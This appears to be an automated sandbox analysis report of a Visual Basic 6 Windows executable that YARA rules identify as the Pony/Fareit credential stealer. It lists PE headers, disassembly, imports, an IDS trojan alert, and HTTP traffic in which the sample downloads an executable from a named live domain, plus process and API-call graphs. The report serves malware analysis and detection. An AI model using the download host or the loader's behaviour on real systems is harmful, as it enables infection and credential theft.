                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM..SM..SM...Q..RM...o..UM..ek..RM..RichSM..................PE..L....b.Z.................p...@....................@........
                                Icon Hash:2c58a6a5300b0503
                                Entrypoint:0x4012b0
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:
                                Time Stamp:0x5AE962D7 [Wed May 2 07:03:51 2018 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:d0fc2e651b4758ccb12e19df8df46000
                                Instruction
                                push 00401408h
                                call 00007F1E34DC7C65h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                cmp byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 35h
                                leave
                                ret
                                inc edx
                                pop edx
                                jnl 00007F1E34DC7CC0h
                                mov ebp, 618D87FDh
                                pop ebp
                                mov esi, 00000089h
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+6Fh], cl
                                jc 00007F1E34DC7CE0h
                                je 00007F1E34DC7CA8h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                add byte ptr [eax], al
                                add al, al
                                sbb eax, 00070040h
                                add byte ptr [eax], al
                                push 0700401Dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                sbb eax, 00070040h
                                add byte ptr [eax], al
                                cwde
                                sbb al, 40h
                                add byte ptr [ecx], al
                                add byte ptr [4018B400h], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add bh, bh
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x974940x28.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x9a0000x1ce0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x104.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x969440x970008a80ace0a11c67f29cc3158706c36cd1False0.3374961196192053data6.350406111571056IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .data0x980000x13480x1000620f0b67a91f7f74151bc5be745b7110False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x9a0000x1ce00x2000fb2105c4b567090f2a330495ce781db3False0.490966796875data4.451310478564093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x9b4380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 11520.7373646209386282
                                RT_ICON0x9a7900xca8Device independent bitmap graphic, 32 x 64 x 24, image size 32000.5070987654320988
                                RT_ICON0x9a4280x368Device independent bitmap graphic, 16 x 32 x 24, image size 8320.5573394495412844
                                RT_GROUP_ICON0x9a3f80x30data0.9583333333333334
                                RT_VERSION0x9a1500x2a8dataEnglishUnited States0.5058823529411764
                                DLLImport
                                MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, __vbaCyAdd, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaCyI4, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaVarMul, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarAdd, __vbaLateMemCall, __vbaStrComp, __vbaLateMemCallLd, __vbaVarSetObjAddref, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                04/23/24-21:47:30.497908TCP2014562ET TROJAN Pony Downloader HTTP Library MSIE 5 Win984973080192.168.2.4144.76.41.117
                                TimestampSource PortDest PortSource IPDest IP
                                Apr 23, 2024 21:47:30.288014889 CEST4973080192.168.2.4144.76.41.117
                                Apr 23, 2024 21:47:30.497503042 CEST8049730144.76.41.117192.168.2.4
                                Apr 23, 2024 21:47:30.497715950 CEST4973080192.168.2.4144.76.41.117
                                Apr 23, 2024 21:47:30.497908115 CEST4973080192.168.2.4144.76.41.117
                                Apr 23, 2024 21:47:30.706665993 CEST8049730144.76.41.117192.168.2.4
                                Apr 23, 2024 21:47:30.707003117 CEST8049730144.76.41.117192.168.2.4
                                Apr 23, 2024 21:47:30.707020998 CEST8049730144.76.41.117192.168.2.4
                                Apr 23, 2024 21:47:30.707091093 CEST4973080192.168.2.4144.76.41.117
                                Apr 23, 2024 21:47:30.711123943 CEST4973080192.168.2.4144.76.41.117
                                Apr 23, 2024 21:47:30.723572969 CEST49731443192.168.2.4144.76.41.117
                                Apr 23, 2024 21:47:30.723620892 CEST44349731144.76.41.117192.168.2.4
                                Apr 23, 2024 21:47:30.723702908 CEST49731443192.168.2.4144.76.41.117
                                Apr 23, 2024 21:47:30.723731995 CEST49731443192.168.2.4144.76.41.117
                                Apr 23, 2024 21:47:30.723737955 CEST44349731144.76.41.117192.168.2.4
                                Apr 23, 2024 21:47:30.723995924 CEST44349731144.76.41.117192.168.2.4
                                Apr 23, 2024 21:47:30.920188904 CEST8049730144.76.41.117192.168.2.4
                                TimestampSource PortDest PortSource IPDest IP
                                Apr 23, 2024 21:47:29.680064917 CEST6181653192.168.2.41.1.1.1
                                Apr 23, 2024 21:47:30.284951925 CEST53618161.1.1.1192.168.2.4
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Apr 23, 2024 21:47:29.680064917 CEST192.168.2.41.1.1.10x8b7dStandard query (0)smartoffice-eg.comA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Apr 23, 2024 21:47:30.284951925 CEST1.1.1.1192.168.2.40x8b7dNo error (0)smartoffice-eg.com144.76.41.117A (IP address)IN (0x0001)false
                                • smartoffice-eg.com
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449730144.76.41.117805904C:\Users\user\Desktop\BW38j8Jkbl.exe
                                TimestampBytes transferredDirectionData
                                Apr 23, 2024 21:47:30.497908115 CEST191OUTGET /include/rili/shit.exe HTTP/1.0
                                Host: smartoffice-eg.com
                                Accept: */*
                                Accept-Encoding: identity, *;q=0
                                Connection: close
                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                Apr 23, 2024 21:47:30.707003117 CEST488INHTTP/1.1 301 Moved Permanently
                                Date: Tue, 23 Apr 2024 19:47:30 GMT
                                Server: Apache
                                Location: https://smartoffice-eg.com/include/rili/shit.exe
                                Content-Length: 256
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 6d 61 72 74 6f 66 66 69 63 65 2d 65 67 2e 63 6f 6d 2f 69 6e 63 6c 75 64 65 2f 72 69 6c 69 2f 73 68 69 74 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://smartoffice-eg.com/include/rili/shit.exe">here</a>.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.449731144.76.41.1174435904C:\Users\user\Desktop\BW38j8Jkbl.exe
                                TimestampBytes transferredDirectionData
                                Apr 23, 2024 21:47:30.723731995 CEST191OUTGET /include/rili/shit.exe HTTP/1.0
                                Host: smartoffice-eg.com
                                Accept: */*
                                Accept-Encoding: identity, *;q=0
                                Connection: close
                                User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:21:47:20
                                Start date:23/04/2024
                                Path:C:\Users\user\Desktop\BW38j8Jkbl.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\BW38j8Jkbl.exe"
                                Imagebase:0x400000
                                File size:634'880 bytes
                                MD5 hash:2392A10406F41B602ACBBDBBB24E0FF7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                • Rule: pony, Description: Identify Pony, Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                • Rule: Fareit, Description: Fareit Payload, Source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                                Reputation:low
                                Has exited:true

                                Target ID:1
                                Start time:21:47:27
                                Start date:23/04/2024
                                Path:C:\Users\user\Desktop\BW38j8Jkbl.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\BW38j8Jkbl.exe"
                                Imagebase:0x400000
                                File size:634'880 bytes
                                MD5 hash:2392A10406F41B602ACBBDBBB24E0FF7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: pony, Description: Identify Pony, Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                • Rule: Fareit, Description: Fareit Payload, Source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                Reputation:low
                                Has exited:true

                                Target ID:2
                                Start time:21:47:30
                                Start date:23/04/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:21:47:30
                                Start date:23/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:28.6%
                                  Dynamic/Decrypted Code Coverage:10%
                                  Signature Coverage:2.5%
                                  Total number of Nodes:400
                                  Total number of Limit Nodes:14
                                  execution_graph 1108 4012b0 #100 1670 22c15bc 1672 22c1642 1670->1672 1671 22c1842 TerminateProcess 1671->1672 1672->1671 1672->1672 1679 22c1cee 1680 22c1cfa 1679->1680 1683 22c09dd GetPEB 1680->1683 1682 22c1d0c 1683->1682 1109 22c0974 GetPEB 1110 22c0980 1109->1110 1665 401108 1666 401174 1665->1666 1667 40112b 1665->1667 1668 401178 _adj_fpatan _adj_fprem 1666->1668 1667->1668 1669 40112f __vbaExceptHandler 1667->1669 1669->1666 1111 495d40 #606 __vbaStrMove __vbaFreeVar 1112 495e00 1111->1112 1113 495df0 __vbaNew2 1111->1113 1114 495e29 1112->1114 1115 495e17 __vbaHresultCheckObj 1112->1115 1113->1112 1475 495c90 __vbaStrCopy #537 __vbaStrMove __vbaInStrB __vbaFreeStr 1114->1475 1115->1114 1117 495e32 __vbaStrMove __vbaFreeStrList 1118 495e6e 1117->1118 1119 495e5e __vbaNew2 1117->1119 1120 495e8a __vbaHresultCheckObj 1118->1120 1121 495e9c __vbaVarMove 1118->1121 1119->1118 1120->1121 1122 495ee1 1121->1122 1123 495ed1 __vbaNew2 1121->1123 1124 495f03 1122->1124 1125 495ef4 __vbaHresultCheckObj 1122->1125 1123->1122 1126 495f08 __vbaVarMove 1124->1126 1125->1124 1477 495c80 1126->1477 1128 495f29 __vbaVarMove 1478 495c80 1128->1478 1130 495f45 __vbaVarMove 1479 495c80 1130->1479 1132 495f61 __vbaVarMove 1480 495c80 1132->1480 1134 495f7d __vbaVarMove 1481 495c80 1134->1481 1136 495f99 __vbaVarMove 1482 495c80 1136->1482 1138 495fb5 __vbaVarMove 1483 495c80 1138->1483 1140 495fd1 __vbaVarMove 1484 495c80 1140->1484 1142 495fed __vbaVarMove 1485 495c80 1142->1485 1144 496009 __vbaVarMove 1486 495c80 1144->1486 1146 496025 __vbaVarMove 1487 495c80 1146->1487 1148 496041 __vbaVarMove 1488 495c80 1148->1488 1150 49605d __vbaVarMove 1489 495c80 1150->1489 1152 496079 __vbaVarMove 1490 495c80 1152->1490 1154 496095 __vbaVarMove 1491 495c80 1154->1491 1156 4960b1 __vbaVarMove 1492 495c80 1156->1492 1158 4960cd __vbaVarMove 1493 495c80 1158->1493 1160 4960e9 __vbaVarMove 1494 495c80 1160->1494 1162 496105 __vbaVarMove 1495 495c80 1162->1495 1164 496121 __vbaVarMove 1496 495c80 1164->1496 1166 49613d __vbaVarMove 1497 495c80 1166->1497 1168 496159 __vbaVarMove 1498 495c80 1168->1498 1170 496175 __vbaVarMove 1499 495c80 1170->1499 1172 496191 __vbaVarMove 1500 495c80 1172->1500 1174 4961ad __vbaVarMove 1501 495c80 1174->1501 1176 4961c9 __vbaVarMove 1502 495c80 1176->1502 1178 4961e5 __vbaVarMove 1503 495c80 1178->1503 1180 496201 __vbaVarMove 1504 495c80 1180->1504 1182 49621d __vbaVarMove 1505 495c80 1182->1505 1184 496239 __vbaVarMove 1506 495c80 1184->1506 1186 496255 __vbaVarMove 1507 495c80 1186->1507 1188 496271 __vbaVarMove 1508 495c80 1188->1508 1190 49628d __vbaVarMove 1509 495c80 1190->1509 1192 4962a9 __vbaVarMove 1510 495c80 1192->1510 1194 4962c5 __vbaVarMove 1511 495c80 1194->1511 1196 4962e1 __vbaVarMove 1512 495c80 1196->1512 1198 4962fd __vbaVarMove 1513 495c80 1198->1513 1200 496319 __vbaVarMove 1514 495c80 1200->1514 1202 496335 __vbaVarMove 1515 495c80 1202->1515 1204 496351 __vbaVarMove 1516 495c80 1204->1516 1206 49636d __vbaVarMove 1517 495c80 1206->1517 1208 496389 __vbaVarMove 1518 495c80 1208->1518 1210 4963a5 __vbaVarMove 1519 495c80 1210->1519 1212 4963c1 __vbaVarMove 1520 495c80 1212->1520 1214 4963dd __vbaVarMove 1521 495c80 1214->1521 1216 4963f9 __vbaVarMove 1522 495c80 1216->1522 1218 496415 __vbaVarMove 1523 495c80 1218->1523 1220 496431 __vbaVarMove 1524 495c80 1220->1524 1222 49644d __vbaVarMove 1525 495c80 1222->1525 1224 496469 __vbaVarMove 1526 495c80 1224->1526 1226 496485 __vbaVarMove 1527 495c80 1226->1527 1228 4964a1 __vbaVarMove 1528 495c80 1228->1528 1230 4964bd __vbaVarMove 1529 495c80 1230->1529 1232 4964d9 __vbaVarMove 1530 495c80 1232->1530 1234 4964f5 __vbaVarMove 1531 495c80 1234->1531 1236 496511 __vbaVarMove 1532 495c80 1236->1532 1238 49652d __vbaVarMove 1533 495c80 1238->1533 1240 496549 __vbaVarMove 1534 495c80 1240->1534 1242 496565 __vbaVarMove 1535 495c80 1242->1535 1244 496581 __vbaVarMove 1536 495c80 1244->1536 1246 49659d __vbaVarMove 1537 495c80 1246->1537 1248 4965b9 __vbaVarMove 1538 495c80 1248->1538 1250 4965d5 __vbaVarMove 1539 495c80 1250->1539 1252 4965f1 __vbaVarMove 1540 495c80 1252->1540 1254 49660d __vbaVarMove 1541 495c80 1254->1541 1256 496629 __vbaVarMove 1542 495c80 1256->1542 1258 496645 __vbaVarMove 1543 495c80 1258->1543 1260 496661 __vbaVarMove 1544 495c80 1260->1544 1262 49667d __vbaVarMove 1545 495c80 1262->1545 1264 496699 __vbaVarMove 1546 495c80 1264->1546 1266 4966b5 __vbaVarMove 1547 495c80 1266->1547 1268 4966d1 __vbaVarMove 1548 495c80 1268->1548 1270 4966ed __vbaVarMove 1549 495c80 1270->1549 1272 496709 __vbaVarMove 1550 495c80 1272->1550 1274 496725 __vbaVarMove 1551 495c80 1274->1551 1276 496741 __vbaVarMove 1552 495c80 1276->1552 1278 49675d __vbaVarMove 1553 495c80 1278->1553 1280 496779 __vbaVarMove 1554 495c80 1280->1554 1282 496795 __vbaVarMove 1555 495c80 1282->1555 1284 4967b1 __vbaVarMove 1556 495c80 1284->1556 1286 4967cd __vbaVarMove 1557 495c80 1286->1557 1288 4967e9 __vbaVarMove 1558 495c80 1288->1558 1290 496805 __vbaVarMove 1559 495c80 1290->1559 1292 496821 __vbaVarMove 1560 495c80 1292->1560 1294 49683d __vbaVarMove 1561 495c80 1294->1561 1296 496859 __vbaVarMove 1562 495c80 1296->1562 1298 496875 __vbaVarMove 1563 495c80 1298->1563 1300 496891 __vbaVarMove 1564 495c80 1300->1564 1302 4968ad __vbaVarMove 1565 495c80 1302->1565 1304 4968c9 __vbaVarMove 1566 495c80 1304->1566 1306 4968e5 __vbaVarMove 1567 495c80 1306->1567 1308 496901 __vbaVarMove 1568 495c80 1308->1568 1310 49691d __vbaVarMove 1569 495c80 1310->1569 1312 496939 __vbaVarMove 1570 495c80 1312->1570 1314 496955 __vbaVarMove 1571 495c80 1314->1571 1316 496971 __vbaVarMove 1572 495c80 1316->1572 1318 49698d __vbaVarMove 1573 495c80 1318->1573 1320 4969a9 __vbaVarMove 1574 495c80 1320->1574 1322 4969c5 __vbaVarMove 1575 495c80 1322->1575 1324 4969e1 __vbaVarMove 1576 495c80 1324->1576 1326 4969fd __vbaVarMove 1577 495c80 1326->1577 1328 496a19 __vbaVarMove 1578 495c80 1328->1578 1330 496a35 __vbaVarMove 1579 495c80 1330->1579 1332 496a51 __vbaVarMove 1580 495c80 1332->1580 1334 496a6d __vbaVarMove 1581 495c80 1334->1581 1336 496a89 __vbaVarMove 1582 495c80 1336->1582 1338 496aa5 __vbaVarMove 1583 495c80 1338->1583 1340 496ac1 __vbaVarMove 1584 495c80 1340->1584 1342 496add __vbaVarMove 1585 495c80 1342->1585 1344 496af9 __vbaVarMove 1586 495c80 1344->1586 1346 496b15 __vbaVarMove 1587 495c80 1346->1587 1348 496b31 __vbaVarMove 1588 495c80 1348->1588 1350 496b4d __vbaVarMove 1589 495c80 1350->1589 1352 496b69 __vbaVarMove 1590 495c80 1352->1590 1354 496b85 __vbaVarMove 1591 495c80 1354->1591 1356 496ba1 __vbaVarMove 1592 495c80 1356->1592 1358 496bbd __vbaVarMove 1593 495c80 1358->1593 1360 496bd9 __vbaVarMove 1594 495c80 1360->1594 1362 496bf5 __vbaVarMove 1595 495c80 1362->1595 1364 496c11 __vbaVarMove 1596 495c80 1364->1596 1366 496c2d __vbaVarMove 1597 495c80 1366->1597 1368 496c49 __vbaVarMove 1598 495c80 1368->1598 1370 496c65 __vbaVarMove 1599 495c80 1370->1599 1372 496c81 __vbaVarMove 1600 495c80 1372->1600 1374 496c9d __vbaVarMove 1601 495c80 1374->1601 1376 496cb9 __vbaVarMove 1602 495c80 1376->1602 1378 496cd5 __vbaVarMove 1603 495c80 1378->1603 1380 496cf1 __vbaVarMove 1604 495c80 1380->1604 1382 496d0d __vbaVarMove 1605 495c80 1382->1605 1384 496d29 __vbaVarMove 1606 495c80 1384->1606 1386 496d45 __vbaVarMove 1607 495c80 1386->1607 1388 496d61 __vbaVarMove 1608 495c80 1388->1608 1390 496d7d __vbaVarMove 1609 495c80 1390->1609 1392 496d99 __vbaVarMove 1610 495c80 1392->1610 1394 496db5 __vbaVarMove 1611 495c80 1394->1611 1396 496dd1 __vbaVarMove 1612 495c80 1396->1612 1398 496ded __vbaVarMove 1613 495c80 1398->1613 1400 496e09 __vbaVarMove 1614 495c80 1400->1614 1402 496e25 __vbaVarMove 1615 495c80 1402->1615 1404 496e41 __vbaVarMove 1616 495c80 1404->1616 1406 496e5d __vbaVarMove 1617 495c80 1406->1617 1408 496e79 __vbaVarMove 1618 495c80 1408->1618 1410 496e95 __vbaVarMove 1619 495c80 1410->1619 1412 496eb1 __vbaVarMove 1620 495c80 1412->1620 1414 496ecd __vbaVarMove 1621 495c80 1414->1621 1416 496ee9 __vbaVarMove 1622 495c80 1416->1622 1418 496f05 __vbaVarMove 1623 495c80 1418->1623 1420 496f21 __vbaVarMove 1624 495c80 1420->1624 1422 496f3d __vbaVarMove 1625 495c80 1422->1625 1424 496f59 __vbaVarMove 1626 495c80 1424->1626 1426 496f75 __vbaVarMove 1627 495c80 1426->1627 1428 496f91 __vbaVarMove 1628 495c80 1428->1628 1430 496fad __vbaVarMove 1629 495c80 1430->1629 1432 496fc9 __vbaVarMove 1630 495c80 1432->1630 1434 496fe5 __vbaVarMove 1631 495c80 1434->1631 1436 497001 __vbaVarMove 1632 495c80 1436->1632 1438 49701d __vbaVarMove 1633 495c80 1438->1633 1440 497039 __vbaVarMove 1634 495c80 1440->1634 1442 497055 __vbaVarMove 1635 495c80 1442->1635 1444 497071 __vbaVarMove 1636 495c80 1444->1636 1446 49708d __vbaVarMove 1637 495c80 1446->1637 1448 4970a9 __vbaVarMove 1638 495c80 1448->1638 1450 4970c5 __vbaVarMove 1639 495c80 1450->1639 1452 4970e1 __vbaVarMove 1453 4970fe __vbaVarAdd __vbaVarMove #685 __vbaObjSet 1452->1453 1454 497147 __vbaFreeObj __vbaVarTstNe 1453->1454 1454->1453 1455 49717d 1454->1455 1456 497196 __vbaObjSetAddref __vbaStrCopy #519 __vbaStrMove __vbaVarTstNe 1455->1456 1457 497186 __vbaNew2 1455->1457 1458 497225 1456->1458 1459 4971f5 __vbaVarMul __vbaVarMove 1456->1459 1457->1456 1460 497235 __vbaCyI4 __vbaCyAdd __vbaUbound 1458->1460 1459->1458 1461 49726d #598 1460->1461 1462 497273 __vbaFpCmpCy 1460->1462 1461->1462 1462->1460 1463 497291 __vbaLateMemCallLd __vbaVarTstNe __vbaFreeVar 1462->1463 1464 4972e8 1463->1464 1465 4973ef 9 API calls 1463->1465 1466 497314 1464->1466 1467 497304 __vbaNew2 1464->1467 1469 497330 __vbaHresultCheckObj 1466->1469 1470 497342 __vbaVarMove __vbaI4Var 1466->1470 1467->1466 1469->1470 1640 401cb0 1470->1640 1476 495d19 __vbaFreeStr 1475->1476 1476->1117 1477->1128 1478->1130 1479->1132 1480->1134 1481->1136 1482->1138 1483->1140 1484->1142 1485->1144 1486->1146 1487->1148 1488->1150 1489->1152 1490->1154 1491->1156 1492->1158 1493->1160 1494->1162 1495->1164 1496->1166 1497->1168 1498->1170 1499->1172 1500->1174 1501->1176 1502->1178 1503->1180 1504->1182 1505->1184 1506->1186 1507->1188 1508->1190 1509->1192 1510->1194 1511->1196 1512->1198 1513->1200 1514->1202 1515->1204 1516->1206 1517->1208 1518->1210 1519->1212 1520->1214 1521->1216 1522->1218 1523->1220 1524->1222 1525->1224 1526->1226 1527->1228 1528->1230 1529->1232 1530->1234 1531->1236 1532->1238 1533->1240 1534->1242 1535->1244 1536->1246 1537->1248 1538->1250 1539->1252 1540->1254 1541->1256 1542->1258 1543->1260 1544->1262 1545->1264 1546->1266 1547->1268 1548->1270 1549->1272 1550->1274 1551->1276 1552->1278 1553->1280 1554->1282 1555->1284 1556->1286 1557->1288 1558->1290 1559->1292 1560->1294 1561->1296 1562->1298 1563->1300 1564->1302 1565->1304 1566->1306 1567->1308 1568->1310 1569->1312 1570->1314 1571->1316 1572->1318 1573->1320 1574->1322 1575->1324 1576->1326 1577->1328 1578->1330 1579->1332 1580->1334 1581->1336 1582->1338 1583->1340 1584->1342 1585->1344 1586->1346 1587->1348 1588->1350 1589->1352 1590->1354 1591->1356 1592->1358 1593->1360 1594->1362 1595->1364 1596->1366 1597->1368 1598->1370 1599->1372 1600->1374 1601->1376 1602->1378 1603->1380 1604->1382 1605->1384 1606->1386 1607->1388 1608->1390 1609->1392 1610->1394 1611->1396 1612->1398 1613->1400 1614->1402 1615->1404 1616->1406 1617->1408 1618->1410 1619->1412 1620->1414 1621->1416 1622->1418 1623->1420 1624->1422 1625->1424 1626->1426 1627->1428 1628->1430 1629->1432 1630->1434 1631->1436 1632->1438 1633->1440 1634->1442 1635->1444 1636->1446 1637->1448 1638->1450 1639->1452 1641 401cb9 1640->1641 1651 22c2226 1654 22c0974 GetPEB 1651->1654 1655 22c0980 1654->1655 1673 22c0297 1674 22c029a Sleep 1673->1674 1675 22c02a9 1674->1675 1675->1674 1676 22c02c1 GetPEB 1675->1676 1678 22c31cf 1675->1678 1676->1678 1656 22c1330 1657 22c0974 GetPEB 1656->1657 1658 22c1336 1657->1658 1659 22c2db2 1658->1659 1661 22c158c 1658->1661 1662 22c0974 GetPEB 1661->1662 1664 22c1592 1662->1664 1663 22c1842 TerminateProcess 1663->1659 1663->1664 1664->1663 1664->1664 1642 22c1a52 1644 22c1642 TerminateProcess 1642->1644 1645 22c02b3 1646 22c029a Sleep 1645->1646 1647 22c02c1 GetPEB 1645->1647 1649 22c02a9 1646->1649 1650 22c31cf 1647->1650 1649->1645 1649->1650

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 414 22c02b3-22c02bf 415 22c029a-22c02a2 Sleep 414->415 416 22c02c1-22c03b5 GetPEB 414->416 418 22c02a9-22c02ac 415->418 419 22c31cf-22c3ab7 416->419 418->419 420 22c02b2 418->420 420->414
                                  APIs
                                  • Sleep.KERNELBASE(00000001), ref: 022C029C
                                  Memory Dump Source
